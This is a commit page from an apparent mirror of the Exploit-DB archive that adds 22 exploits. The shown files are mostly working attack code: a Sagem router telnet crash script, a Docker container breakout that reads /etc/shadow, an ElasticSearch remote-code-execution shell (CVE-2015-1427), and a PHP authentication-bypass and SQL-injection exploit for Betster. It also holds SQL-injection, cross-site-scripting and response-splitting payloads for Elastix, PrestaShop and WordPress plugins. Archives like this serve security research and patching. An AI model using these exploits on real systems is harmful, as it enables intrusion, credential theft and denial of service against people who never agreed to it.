bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Update: 2015-03-13

Browse source 
22 new exploits
This commit is contained in:
Offensive Security 2015-03-13 08:35:51 +00:00
parent db442f2fc9
commit f8f13f8ec0
24 changed files with 775 additions and 99 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

26
files.csv
View file

@ -7391,7 +7391,7 @@ id,file,description,date,author,platform,type,port
7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - (.m3u ) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0
7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - (.m3u) Local Buffer Overflow PoC",2009-01-25,AlpHaNiX,windows,dos,0
7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 m3u file Local Buffer Overflow PoC",2009-01-25,Houssamix,windows,dos,0
7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - CSRF Exploit",2009-01-25,spdr,hardware,remote,0
7859,platforms/php/webapps/7859.pl,"MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0
@ -30456,7 +30456,7 @@ id,file,description,date,author,platform,type,port
33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0
33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
33808,platforms/linux/local/33808.c,"docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
@ -32724,8 +32724,11 @@ id,file,description,date,author,platform,type,port
36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection Vulnerability",2011-11-14,E.Shahmohamadi,php,webapps,0
36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection Vulnerability",2015-03-06,"ITAS Team",php,webapps,80
36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555
36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection Vulnerability",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0
36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass And SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0
36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0
36308,platforms/php/webapps/36308.txt,"Webistry 1.6 'pid' Parameter SQL Injection Vulnerability",2011-11-16,CoBRa_21,php,webapps,0
36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash PoC",2015-03-08,"Loudiyi Mohamed",hardware,dos,0
36310,platforms/lin_x86-64/local/36310.txt,"Rowhammer: Linux Kernel Privilege Escalation PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0
36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0
36313,platforms/php/webapps/36313.txt,"webERP <= 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0
@ -32749,3 +32752,22 @@ id,file,description,date,author,platform,type,port
36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM /user/index.php Multiple Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0
36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM /user/info.php id Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0
36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM /admin/boxes.php rowid Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0
36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0
36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0
36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0
36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/googlemap.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 'displayImage.php' HTTP Response Splitting Vulnerability",2011-11-23,RGouveia,php,webapps,0
36346,platforms/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h Multiple Cross Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps,0
36347,platforms/php/webapps/36347.txt,"Hastymail2 'rs' Parameter Cross Site Scripting Vulnerability",2011-11-22,HTrovao,php,webapps,0
36348,platforms/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 SQL Injection Vulnerability",2011-11-23,anonymous,php,webapps,0
36349,platforms/php/webapps/36349.txt,"AdaptCMS 2.0 SQL Injection Vulnerability",2011-11-24,X-Cisadane,php,webapps,0
36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 index.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0
36351,platforms/php/webapps/36351.txt,"alitbang CMS 3.3 alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0
36352,platforms/linux/remote/36352.txt,"Apache HTTP Server 7.0.x 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2011-11-24,"Prutha Parikh",linux,remote,0

Can't render this file because it is too large.

40
platforms/hardware/dos/36309.py Executable file
View file

@ -0,0 +1,40 @@
# Title : Sagem F@st 3304-V2 Telnet Crash POC
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested Router : Sagem F@st 3304-V2 (3304-V1, other versions may also be affected)
# Date : 2015-03-08
# Author : Loudiyi Mohamed
# Contact : Loudiyi.2010@gmail.com
# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
# Vulnerability description:
#==========================
#A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string.
#This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000.
#After the exploit is sent, the telnet service will crash and the router will reboot automatically.
#Usage: python SagemDos.py "IP address"
# Code
#========================================================================
#!/usr/bin/python
import socket
import sys
print("######################################")
print("# DOS Sagem F@st3304 v1-v2 #")
print("# ---------- #")
print("# BY LOUDIYI MOHAMED #")
print("#####################################")
if (len(sys.argv)<2):
print "Usage: %s <host> " % sys.argv[0]
print "Example: %s 192.168.1.1 " % sys.argv[0]
exit(0)
print "\nSending evil buffer..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((sys.argv[1], 23))
buffer = "X"*500000
s.send(buffer)
except:
print "Could not connect to Sagem Telnet!"
#========================================================================

193
platforms/linux/local/33808.c
View file

@ -47,142 +47,141 @@
struct my_file_handle {
unsigned int handle_bytes;
int handle_type;
unsigned char f_handle[8];
unsigned int handle_bytes;
int handle_type;
unsigned char f_handle[8];
};
void die(const char *msg)
{
perror(msg);
exit(errno);
perror(msg);
exit(errno);
}
void dump_handle(const struct my_file_handle *h)
{
fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
h->handle_type);
for (int i = 0; i < h->handle_bytes; ++i) {
fprintf(stderr,"0x%02x", h->f_handle[i]);
if ((i + 1) % 20 == 0)
fprintf(stderr,"\n");
if (i < h->handle_bytes - 1)
fprintf(stderr,", ");
}
fprintf(stderr,"};\n");
fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
h->handle_type);
for (int i = 0; i < h->handle_bytes; ++i) {
fprintf(stderr,"0x%02x", h->f_handle[i]);
if ((i + 1) % 20 == 0)
fprintf(stderr,"\n");
if (i < h->handle_bytes - 1)
fprintf(stderr,", ");
}
fprintf(stderr,"};\n");
}
int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
{
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR *dir = NULL;
struct dirent *de = NULL;
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR *dir = NULL;
struct dirent *de = NULL;
path = strchr(path, '/');
path = strchr(path, '/');
// recursion stops if path has been resolved
if (!path) {
memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
oh->handle_type = 1;
oh->handle_bytes = 8;
return 1;
}
++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
// recursion stops if path has been resolved
if (!path) {
memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
oh->handle_type = 1;
oh->handle_bytes = 8;
return 1;
}
++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de->d_name);
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
ino = de->d_ino;
break;
}
}
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de->d_name);
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
ino = de->d_ino;
break;
}
}
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, &ino, sizeof(ino));
memcpy(outh.f_handle + 4, &i, sizeof(i));
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, &ino, sizeof(ino));
memcpy(outh.f_handle + 4, &i, sizeof(i));
if ((i % (1<<20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle(&outh);
return find_handle(bfd, path, &outh, oh);
}
}
}
if ((i % (1<<20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle(&outh);
return find_handle(bfd, path, &outh, oh);
}
}
}
closedir(dir);
close(fd);
return 0;
closedir(dir);
close(fd);
return 0;
}
int main()
{
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
};
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
};
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
read(0, buf, 1);
read(0, buf, 1);
// get a FS reference from something mounted in from outside
if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
die("[-] open");
// get a FS reference from something mounted in from outside
if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
die("[-] open");
if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");
if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");
fprintf(stderr, "[!] Got a final handle!\n");
dump_handle(&h);
fprintf(stderr, "[!] Got a final handle!\n");
dump_handle(&h);
if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
die("[-] open_by_handle");
if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
die("[-] open_by_handle");
memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
die("[-] read");
memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
die("[-] read");
fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
close(fd2); close(fd1);
close(fd2); close(fd1);
return 0;
return 0;
}

56
platforms/linux/remote/36337.py Executable file
View file

@ -0,0 +1,56 @@
#!/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150309.1
# Licence: WTFPL - wtfpl.net
import json
import requests
import sys
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
__version__ = "20150309.1"
def banner():
print """\x1b[1;32m
?????? ??? ??? ?????? ????????? ??? ?????? ?????? ??? ?? ?????? ??? ???
?? ? ???? ?????? ??? ? ? ??? ?????????? ?? ??? ? ???? ????? ? ???? ????
???? ???? ??? ??? ? ???? ? ???? ????????? ? ? ???? ???????????? ???? ????
??? ? ???? ????????? ? ???? ???? ? ???????? ???? ? ?????? ??? ??? ? ???? ????
????????????????? ????????????? ???? ? ????? ????? ?????????????????????????????????????????
?? ?? ?? ??? ??? ????? ??? ? ? ? ?? ?? ? ?? ? ?? ??? ? ? ? ??????? ?? ?? ??? ?? ??? ?
? ? ?? ? ? ? ? ?? ?? ?? ? ? ? ? ? ? ? ? ?? ? ? ? ??? ? ? ? ?? ? ? ?? ? ? ?
? ? ? ? ? ? ? ? ? ? ?? ? ? ? ? ?? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
Exploit for ElasticSearch , CVE-2015-1427 Version: %s\x1b[0m""" %(__version__)
def execute_command(target, command):
payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
try:
url = "http://%s:9200/_search?pretty" %(target)
r = requests.post(url=url, data=payload)
except Exception, e:
sys.exit("Exception Hit"+str(e))
values = json.loads(r.text)
fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
print fuckingjson.strip()
def exploit(target):
print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
while True:
cmd = raw_input("~$ ")
if cmd == "exit":
sys.exit("{!} Shell exiting!")
else:
execute_command(target=target, command=cmd)
def main(args):
banner()
if len(args) != 2:
sys.exit("Use: %s target" %(args[0]))
exploit(target=args[1])
if __name__ == "__main__":
main(args=sys.argv)

10
platforms/linux/remote/36352.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50802/info
Apache HTTP Server is prone to a security-bypass vulnerability.
Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications.
The following example patterns are available:
RewriteRule ^(.*) http://www.example.com$1
ProxyPassMatch ^(.*) http://www.example.com$1

47
platforms/php/webapps/36305.txt Executable file
View file

@ -0,0 +1,47 @@
# Title: Elastix v2.x Blind SQL Injection Vulnerability
# Author: Ahmed Aboul-Ela
# Twitter: https://twitter.com/aboul3la
# Vendor : http://www.elastix.org
# Version: v2.5.0 and prior versions should be affected too
- Vulnerable Source Code snippet in "a2billing/customer/iridium_threed.php":
<?php
[...]
line 5: getpost_ifset (array('transactionID', 'sess_id', 'key', 'mc_currency', 'currency', 'md5sig',
'merchant_id', 'mb_amount', 'status','mb_currency','transaction_id', 'mc_fee', 'card_number'));
line 34: $QUERY = "SELECT id, cardid, amount, vat, paymentmethod, cc_owner, cc_number, cc_expires,
creationdate, status, cvv, credit_card_type,currency, item_id, item_type " .
" FROM cc_epayment_log " . " WHERE id = ".$transactionID;
line 37: $transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
[...]
?>
The GET parameter transactionID was used directly in the SQL query
without any sanitization which lead directly to SQL Injection vulnerability.
- Proof of Concept:
http://[host]/a2billing/customer/iridium_threed.php?transactionID=-1 and 1=benchmark(2000000,md5(1))
The backend response will delay for few seconds, which means the benchmark() function was executed successfully
- Mitigation:
The vendor has released a fix for the vulnerability. It is strongly recommended to update your elastix server now
[~] yum update elastix-a2billing
- Time-Line:
Sat, Feb 14, 2015 at 2:19 PM: Vulnerability report sent to Elastix
Wed, Feb 18, 2015 at 4:29 PM: Confirmation of the issue from Elastix
Fri, Mar 6, 2015 at 8:39 PM: Elastix released a fix for the vulnerability
Sat, Mar 7, 2015 at 5:15 PM: The public responsible disclosure
- Credits:
Ahmed Aboul-Ela - Cyber Security Analyst @ EG-CERT

151
platforms/php/webapps/36306.txt Executable file
View file

@ -0,0 +1,151 @@
<?php
/*
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
Exploit Title : Betster (PHP Betoffice) Authentication Bypass and SQL Injection
Date : 6 March 2015
Exploit Author : CWH Underground
Discovered By : ZeQ3uL
Site : www.2600.in.th
Vendor Homepage : http://betster.sourceforge.net/
Software Link : http://downloads.sourceforge.net/project/betster/betster-1.0.4.zip
Version : 1.0.4
Tested on : Linux, PHP 5.3.9
####################
SOFTWARE DESCRIPTION
####################
Betster is a Software to create a online bet-office based on PHP, MySQL and JavaScript. The system works with variable odds
(betting-exchange with variable decimal odds) and provides a CMS-like backend for handling the bets, users and categories.
################################################################
VULNERABILITY: SQL Injection (showprofile.php, categoryedit.php)
################################################################
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
depending on the query, DBMS and configuration.
/showprofile.php (LINE: 63)
-----------------------------------------------------------------------------
if (($session->getState()) &&
(($user->getStatus() == "administrator") ||
($user->getStatus() == "betmaster"))){
$mainhtml = file_get_contents("tpl/showprofile.inc");
$id = htmlspecialchars($_GET['id']); <<<< WTF !!
$xuser = $db_mapper->getUserById($id);
-----------------------------------------------------------------------------
/categoryedit.php (LINE: 52)
-----------------------------------------------------------------------------
$id = htmlspecialchars($_GET['id']); <<<< WTF !!
$action = htmlspecialchars($_GET['ac']);
-----------------------------------------------------------------------------
###########################################
VULNERABILITY: Authentication Bypass (SQLi)
###########################################
File index.php (Login function) has SQL Injection vulnerability, "username" parameter supplied in POST parameter for checking valid credentials.
The "username" parameter is not validated before passing into SQL query which arise authentication bypass issue.
#####################################################
EXPLOIT
#####################################################
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 50);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+---------------------------------------------+";
print "\n| Betster Auth Bypass & SQL Injection Exploit |";
print "\n+---------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /betster/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "username=admin%27+or+%27a%27%3D%27a&password=cwh&login=LOGIN";
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
$response = http_send($host, $packet);
if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
$packet = "POST {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
print "\n\n[+] Bypassing Authentication...\n";
sleep(2);
$response=http_send($host, $packet);
preg_match('/menutitle">ADMIN/s', $response) ? print "\n[+] Authentication Bypass Successfully !!\n" : die("\n[-] Bypass Authentication Failed !!\n");
$packet = "GET {$path}showprofile.php?id=1%27%20and%201=2%20union%20select%201,concat(0x3a3a,0x557365723d,user(),0x202c2044425f4e616d653d,database(),0x3a3a),3,4,5,6,7--+ HTTP/1.0\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
print "[+] Performing SQL Injection Attack\n";
sleep(2);
$response1=http_send($host, $packet);
preg_match('/::(.*)::/', $response1, $m) ? print "\n$m[1]\n" : die("\n[-] Exploit failed!\n");
################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>

9
platforms/php/webapps/36338.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50778/info
ClickDesk Live Support plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ClickDesk Live Support 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=[xss]

11
platforms/php/webapps/36339.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50779/info
Featurific For WordPress plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Featurific For WordPress 1.6.2 is vulnerable; other versions may also be affected.
UPDATE April 18, 2012: Further reports indicate this issue may not be a vulnerability; the issue can not be exploited as described.
http://www.example.com/[path]/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=[xss]

9
platforms/php/webapps/36340.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50783/info
Newsletter Meenews Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Newsletter Meenews 5.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/wp-content/plugins/meenews/newsletter.php?idnews=[xss]

10
platforms/php/webapps/36341.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50784/info
PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected.
GET: http://<app_base>/modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php
POST: num_mode=<script>alert(&#039;XSS&#039;)</script>

11
platforms/php/webapps/36342.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50784/info
PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/modules/mondialrelay/googlemap.php?relativ_base_dir=>&#039;);alert(&#039;XSS&#039;);
http://www.example.com/modules/mondialrelay/googlemap.php?relativ_base_dir=">&#039;);alert(&#039;XSS&#039;);
http://<app_base>/modules/mondialrelay/googlemap.php?Pays=&#039;);alert(&#039;XSS&#039;);

10
platforms/php/webapps/36343.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50784/info
PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected.
GET: http://<app_base>/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php
POST: Expedition=<script>alert(&#039;XSS&#039;)</script>

10
platforms/php/webapps/36344.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50784/info
PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected.
GET: http://<app_base>/admin/ajaxfilemanager/ajax_save_text.php
POST: folder=<script>alert(&#039;XSS 1&#039;);</script>&name=<script>alert(&#039;XSS 2&#039;);</script>

10
platforms/php/webapps/36345.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50785/info
Prestashop is prone to an HTTP-response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid various attacks that try to entice client users into a false sense of trust.
Prestashop 1 4.4.1 is vulnerable; other versions may also be affected.
GET: http://www.example.com/admin/displayImage.php?img=<name_of_existing_file_in_md5_format>&name=asa.cmd"%0d%0a%0d%0a@echo off%0d%0aecho running batch file%0d%0apause%0d%0aexit
Note: The <name_of_existing_file_in_md5_format> is the name of one file existing on the "upload/" folder. It&#039;s name must be a MD5 hash, without any extension. ex: "435ed7e9f07f740abf511a62c00eef6e"

16
